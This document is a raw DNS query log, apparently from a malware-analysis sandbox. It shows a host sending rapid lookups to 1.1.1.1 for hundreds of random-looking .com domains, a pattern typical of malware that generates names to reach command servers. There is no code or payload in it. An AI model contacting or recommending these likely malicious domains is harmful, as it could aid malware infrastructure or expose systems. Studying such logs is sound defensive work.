                                                                                                                                                                                                          Sep 8, 2024 10:53:47.291340113 CEST192.168.2.91.1.1.10x51abStandard query (0)gahyziw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.291490078 CEST192.168.2.91.1.1.10xd1a6Standard query (0)vofyruc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.291626930 CEST192.168.2.91.1.1.10x68eaStandard query (0)volycem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.291770935 CEST192.168.2.91.1.1.10x5011Standard query (0)vojyrum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.292093992 CEST192.168.2.91.1.1.10x5643Standard query (0)lyryman.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.292270899 CEST192.168.2.91.1.1.10x490dStandard query (0)lyvyver.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.292371988 CEST192.168.2.91.1.1.10x30d1Standard query (0)pujytug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.294317961 CEST192.168.2.91.1.1.10x2a82Standard query (0)lyxyvyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.296051979 CEST192.168.2.91.1.1.10x861Standard query (0)gatyhos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.297738075 CEST192.168.2.91.1.1.10xcd6dStandard query (0)qegylul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.298588037 CEST192.168.2.91.1.1.10xd8dbStandard query (0)vofykyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.299463987 CEST192.168.2.91.1.1.10x63a2Standard query (0)lykytin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.301577091 CEST192.168.2.91.1.1.10xab7dStandard query (0)qexysev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.966365099 CEST192.168.2.91.1.1.10x8763Standard query (0)galykew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.966645002 CEST192.168.2.91.1.1.10xa87bStandard query (0)lysynun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.966814995 CEST192.168.2.91.1.1.10x3a38Standard query (0)vonypic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.970467091 CEST192.168.2.91.1.1.10xdfb3Standard query (0)vocyzum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.970721006 CEST192.168.2.91.1.1.10xb28Standard query (0)lyryfyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.970938921 CEST192.168.2.91.1.1.10x401dStandard query (0)lymysox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.971318960 CEST192.168.2.91.1.1.10x9d95Standard query (0)purycaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.971481085 CEST192.168.2.91.1.1.10x3469Standard query (0)lykyjar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.971625090 CEST192.168.2.91.1.1.10x7502Standard query (0)vopybym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.971888065 CEST192.168.2.91.1.1.10x9d7cStandard query (0)purydel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.972100019 CEST192.168.2.91.1.1.10x48fbStandard query (0)vojyjot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.972353935 CEST192.168.2.91.1.1.10x7e7cStandard query (0)pufymiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.972501993 CEST192.168.2.91.1.1.10x9da2Standard query (0)vojyqac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.972884893 CEST192.168.2.91.1.1.10xb6e0Standard query (0)qebyxog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.973037004 CEST192.168.2.91.1.1.10xbaecStandard query (0)qexyluq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.973819971 CEST192.168.2.91.1.1.10xa87cStandard query (0)gahyhiz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.973994017 CEST192.168.2.91.1.1.10x2305Standard query (0)gatyveh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.974374056 CEST192.168.2.91.1.1.10xb785Standard query (0)pumyxul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.974539995 CEST192.168.2.91.1.1.10x51f1Standard query (0)lysyfed.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.975100994 CEST192.168.2.91.1.1.10xca5cStandard query (0)qedyfyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.975390911 CEST192.168.2.91.1.1.10x43a6Standard query (0)galyqoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.975598097 CEST192.168.2.91.1.1.10x7c12Standard query (0)volyqam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.975976944 CEST192.168.2.91.1.1.10xb698Standard query (0)lymyxir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.976948023 CEST192.168.2.91.1.1.10xbd78Standard query (0)gadyfys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.977237940 CEST192.168.2.91.1.1.10x53c0Standard query (0)qeqyxil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.978432894 CEST192.168.2.91.1.1.10xf2d3Standard query (0)puzywag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.978642941 CEST192.168.2.91.1.1.10xe9a5Standard query (0)pujywep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.981709003 CEST192.168.2.91.1.1.10x8cceStandard query (0)gacyzuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.981946945 CEST192.168.2.91.1.1.10x177Standard query (0)ganypis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.995788097 CEST192.168.2.91.1.1.10x834aStandard query (0)lyxywen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.005053043 CEST192.168.2.91.1.1.10xbdfdStandard query (0)gaqycow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.017910004 CEST192.168.2.91.1.1.10xd1b9Standard query (0)qexyreg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.018093109 CEST192.168.2.91.1.1.10xe630Standard query (0)vofyguc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.018229008 CEST192.168.2.91.1.1.10xe3d1Standard query (0)pufygup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.037592888 CEST192.168.2.91.1.1.10x6944Standard query (0)vowycok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.042906046 CEST192.168.2.91.1.1.10x67ebStandard query (0)vocyryf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.902719975 CEST192.168.2.91.1.1.10x66beStandard query (0)vonyzut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.903717995 CEST192.168.2.91.1.1.10xc4cStandard query (0)qekyqoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.906100988 CEST192.168.2.91.1.1.10xbd2dStandard query (0)pupydev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.914922953 CEST192.168.2.91.1.1.10x1e4eStandard query (0)ganyzuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.917457104 CEST192.168.2.91.1.1.10xc3aStandard query (0)vopydaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.921974897 CEST192.168.2.91.1.1.10x9832Standard query (0)qebylyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.922610998 CEST192.168.2.91.1.1.10x2b7Standard query (0)pujymiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.922666073 CEST192.168.2.91.1.1.10x3152Standard query (0)lykymij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.926770926 CEST192.168.2.91.1.1.10xf40Standard query (0)pufydaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.928853035 CEST192.168.2.91.1.1.10xfe1cStandard query (0)volyjif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.929450989 CEST192.168.2.91.1.1.10xfd9dStandard query (0)vofybet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.930484056 CEST192.168.2.91.1.1.10xf522Standard query (0)lyxyjod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.931334019 CEST192.168.2.91.1.1.10x2982Standard query (0)purypig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.933083057 CEST192.168.2.91.1.1.10xfbefStandard query (0)gacykas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.933852911 CEST192.168.2.91.1.1.10xeeacStandard query (0)lygynyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.941881895 CEST192.168.2.91.1.1.10x9947Standard query (0)pufybyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.942056894 CEST192.168.2.91.1.1.10xfffbStandard query (0)gadydow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.942122936 CEST192.168.2.91.1.1.10x4aa6Standard query (0)puzymup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.942317963 CEST192.168.2.91.1.1.10x8afdStandard query (0)lyxymix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.942449093 CEST192.168.2.91.1.1.10x7287Standard query (0)qexykav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.942536116 CEST192.168.2.91.1.1.10x65ecStandard query (0)gaqypuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.943533897 CEST192.168.2.91.1.1.10xa2f9Standard query (0)vofydak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.944089890 CEST192.168.2.91.1.1.10xa018Standard query (0)vowypim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.945267916 CEST192.168.2.91.1.1.10x4634Standard query (0)vocykec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.945651054 CEST192.168.2.91.1.1.10xf49eStandard query (0)qeqylyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.946137905 CEST192.168.2.91.1.1.10x89d1Standard query (0)qegynul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.946806908 CEST192.168.2.91.1.1.10xf86fStandard query (0)lyryson.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.947531939 CEST192.168.2.91.1.1.10x80abStandard query (0)gahynuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.947762012 CEST192.168.2.91.1.1.10x3289Standard query (0)gaqyzyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.949630022 CEST192.168.2.91.1.1.10x8de9Standard query (0)puvylep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.956641912 CEST192.168.2.91.1.1.10x31eaStandard query (0)vowyzuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.957263947 CEST192.168.2.91.1.1.10xfa9aStandard query (0)qetysog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.957465887 CEST192.168.2.91.1.1.10x2bd0Standard query (0)vojymuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.959950924 CEST192.168.2.91.1.1.10xaed2Standard query (0)puryxuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.960351944 CEST192.168.2.91.1.1.10x8f48Standard query (0)lygyfej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.965394020 CEST192.168.2.91.1.1.10x5e3Standard query (0)vocyqot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.965424061 CEST192.168.2.91.1.1.10x727Standard query (0)qegyfeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.965960979 CEST192.168.2.91.1.1.10xea9aStandard query (0)gacyqoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.983294010 CEST192.168.2.91.1.1.10xfb21Standard query (0)lyvylyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.983582973 CEST192.168.2.91.1.1.10x9286Standard query (0)qexyqip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.989006042 CEST192.168.2.91.1.1.10x4a85Standard query (0)vojygym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.989373922 CEST192.168.2.91.1.1.10xd912Standard query (0)gahyfyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.989928961 CEST192.168.2.91.1.1.10xd6e8Standard query (0)lyryxud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.010085106 CEST192.168.2.91.1.1.10xe6cdStandard query (0)gatydab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.014280081 CEST192.168.2.91.1.1.10x2230Standard query (0)gatycis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.133919954 CEST192.168.2.91.1.1.10x457bStandard query (0)puvywal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.230269909 CEST192.168.2.91.1.1.10x8b8eStandard query (0)lyvywar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.230793953 CEST192.168.2.91.1.1.10x96e7Standard query (0)qetyxiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.234846115 CEST192.168.2.91.1.1.10x77caStandard query (0)pupycop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:50.234952927 CEST192.168.2.91.1.1.10xe79eStandard query (0)lykygun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.268610954 CEST192.168.2.91.1.1.10xc90dStandard query (0)qedyfyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.269953966 CEST192.168.2.91.1.1.10x4892Standard query (0)pupybul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.282124043 CEST192.168.2.91.1.1.10xcfbcStandard query (0)qeqykop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.282500982 CEST192.168.2.91.1.1.10x32f8Standard query (0)gahycuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.282766104 CEST192.168.2.91.1.1.10xf254Standard query (0)puzywel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.282933950 CEST192.168.2.91.1.1.10xa3eaStandard query (0)lygyxux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.285453081 CEST192.168.2.91.1.1.10xf9a4Standard query (0)puvygyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.285623074 CEST192.168.2.91.1.1.10x71dcStandard query (0)qetyraq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.287408113 CEST192.168.2.91.1.1.10x34ddStandard query (0)vocygef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.287739038 CEST192.168.2.91.1.1.10xccf5Standard query (0)lyrywoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.288081884 CEST192.168.2.91.1.1.10xc5a4Standard query (0)qexyfag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.289377928 CEST192.168.2.91.1.1.10x7da3Standard query (0)purywoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.289573908 CEST192.168.2.91.1.1.10xa5dbStandard query (0)gaqyqiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.289926052 CEST192.168.2.91.1.1.10xce45Standard query (0)gacyfeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.291750908 CEST192.168.2.91.1.1.10xe855Standard query (0)ganyhus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.293747902 CEST192.168.2.91.1.1.10xe1e0Standard query (0)vofyzyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.293935061 CEST192.168.2.91.1.1.10x1bbdStandard query (0)vowydef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.294075012 CEST192.168.2.91.1.1.10x5414Standard query (0)lyxyfan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.294105053 CEST192.168.2.91.1.1.10x33e1Standard query (0)qekykev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.294287920 CEST192.168.2.91.1.1.10x984fStandard query (0)pufyxyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.294325113 CEST192.168.2.91.1.1.10x92c9Standard query (0)lysynur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.294444084 CEST192.168.2.91.1.1.10x227cStandard query (0)vowyqik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.295022964 CEST192.168.2.91.1.1.10xe89dStandard query (0)qegyxup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.295804977 CEST192.168.2.91.1.1.10xaf79Standard query (0)vopyrem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.296461105 CEST192.168.2.91.1.1.10x968fStandard query (0)qeqysag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.296890974 CEST192.168.2.91.1.1.10xa5dStandard query (0)puzydog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.297600031 CEST192.168.2.91.1.1.10x76cStandard query (0)pumypog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.298217058 CEST192.168.2.91.1.1.10xb7c4Standard query (0)qedynul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.303864956 CEST192.168.2.91.1.1.10xf996Standard query (0)lykyvor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.303951979 CEST192.168.2.91.1.1.10x7eb5Standard query (0)vonyjuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.307383060 CEST192.168.2.91.1.1.10xfc4aStandard query (0)gatyrah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.307780981 CEST192.168.2.91.1.1.10xba2aStandard query (0)pujycil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.342204094 CEST192.168.2.91.1.1.10xcd96Standard query (0)pufymoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.354352951 CEST192.168.2.91.1.1.10xec65Standard query (0)vonyzuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.355160952 CEST192.168.2.91.1.1.10xd849Standard query (0)purydyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.355356932 CEST192.168.2.91.1.1.10xd258Standard query (0)volykyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.355568886 CEST192.168.2.91.1.1.10x7d05Standard query (0)lymysan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.355807066 CEST192.168.2.91.1.1.10x55edStandard query (0)puvyxil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.358045101 CEST192.168.2.91.1.1.10x76f6Standard query (0)qegyqaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.358423948 CEST192.168.2.91.1.1.10x98Standard query (0)lygymoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.359127998 CEST192.168.2.91.1.1.10x4219Standard query (0)vofygum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.359339952 CEST192.168.2.91.1.1.10xfe7fStandard query (0)gaqydeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.359731913 CEST192.168.2.91.1.1.10xf402Standard query (0)lyxylux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.359882116 CEST192.168.2.91.1.1.10x2c82Standard query (0)qexylup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.360033989 CEST192.168.2.91.1.1.10x5fa2Standard query (0)vofymik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.360198975 CEST192.168.2.91.1.1.10x7fb6Standard query (0)lyvygyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.360341072 CEST192.168.2.91.1.1.10x6a40Standard query (0)gacyzuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.360497952 CEST192.168.2.91.1.1.10xbbb1Standard query (0)qeqyxov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.360584021 CEST192.168.2.91.1.1.10x4ef1Standard query (0)pufygug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.416161060 CEST192.168.2.91.1.1.10xeb6cStandard query (0)vowycac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.416560888 CEST192.168.2.91.1.1.10xfbfdStandard query (0)gacyryw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.416843891 CEST192.168.2.91.1.1.10x66cfStandard query (0)lygygin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.416985035 CEST192.168.2.91.1.1.10x48ecStandard query (0)ganypih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.417269945 CEST192.168.2.91.1.1.10x3016Standard query (0)vocyruk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.417532921 CEST192.168.2.91.1.1.10x5e00Standard query (0)qexyryl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.418540001 CEST192.168.2.91.1.1.10xebdaStandard query (0)gaqycos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.419598103 CEST192.168.2.91.1.1.10xbb26Standard query (0)purycap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.420034885 CEST192.168.2.91.1.1.10x3171Standard query (0)lyryfyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.421092987 CEST192.168.2.91.1.1.10x724aStandard query (0)lyxywer.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.421324015 CEST192.168.2.91.1.1.10xc3e1Standard query (0)vojyjof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.421461105 CEST192.168.2.91.1.1.10x7b0cStandard query (0)puvytuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.423407078 CEST192.168.2.91.1.1.10xacb6Standard query (0)pujyjav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.425816059 CEST192.168.2.91.1.1.10x6b45Standard query (0)gahyhob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.427850962 CEST192.168.2.91.1.1.10x5866Standard query (0)lyvytuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.477797031 CEST192.168.2.91.1.1.10xc1c2Standard query (0)lyryvex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.555351973 CEST192.168.2.91.1.1.10xbe08Standard query (0)vopybyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.694495916 CEST192.168.2.91.1.1.10x35e7Standard query (0)qetyvep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.697125912 CEST192.168.2.91.1.1.10x284bStandard query (0)gatyvyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.790776014 CEST192.168.2.91.1.1.10x1944Standard query (0)qebytiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.790776014 CEST192.168.2.91.1.1.10xbc6eStandard query (0)lykyjad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.790947914 CEST192.168.2.91.1.1.10xa621Standard query (0)pumyjip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.793252945 CEST192.168.2.91.1.1.10x376fStandard query (0)lyxynej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.793800116 CEST192.168.2.91.1.1.10x6accStandard query (0)lysytyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.796149969 CEST192.168.2.91.1.1.10x5d87Standard query (0)lymyjix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:04.334394932 CEST192.168.2.91.1.1.10x817fStandard query (0)puzymig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:04.334609985 CEST192.168.2.91.1.1.10xe6f8Standard query (0)qeqylyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:04.334780931 CEST192.168.2.91.1.1.10xf4c4Standard query (0)lyxymin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:04.334937096 CEST192.168.2.91.1.1.10xd063Standard query (0)vofydac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:04.335083961 CEST192.168.2.91.1.1.10xf602Standard query (0)gadydas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:04.335328102 CEST192.168.2.91.1.1.10x2b01Standard query (0)gaqyzuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:04.335510015 CEST192.168.2.91.1.1.10x9ab4Standard query (0)vowyzuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:04.339320898 CEST192.168.2.91.1.1.10x6b3Standard query (0)qegyfyp.comA (IP address)IN (0x0001)false
